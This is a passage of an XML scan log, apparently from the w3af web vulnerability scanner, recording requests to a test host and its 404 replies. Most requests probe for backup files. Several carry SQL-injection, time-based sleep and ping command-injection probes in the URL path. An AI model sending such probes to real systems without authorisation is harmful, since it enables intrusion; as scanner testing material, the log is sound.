            <http-transaction id="374">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="375">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="376">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="383">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="388">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/d%27z%270 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%270 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%270'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="389">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/Cl4j5xwm HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about Cl4j5xwm has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='Cl4j5xwm'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="392">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about sleep%283%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='sleep%283%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="395">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="404">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/68%22+OR+%2268%22%3D%2268 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 68%22+OR+%2268%22%3D%2268 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='68%22+OR+%2268%22%3D%2268'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="418">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/68%22+AND+%2268%22%3D%2269 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 68%22+AND+%2268%22%3D%2269 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='68%22+AND+%2268%22%3D%2269'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="427">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96%27+OR+%2796%27%3D%2796 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96%27+OR+%2796%27%3D%2796 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96%27+OR+%2796%27%3D%2796'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="435">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96%27+AND+%2796%27%3D%2797 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96%27+AND+%2796%27%3D%2797 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96%27+AND+%2796%27%3D%2797'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="438">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="439">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%220 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%220'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="440">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3C%21-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3C%21--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="441">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="442">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="443">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="444">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about cake~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='cake~'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="445">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="446">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="447">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="448">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="450">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="451">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.zip HTTP/1.1</status>
                    <headers>
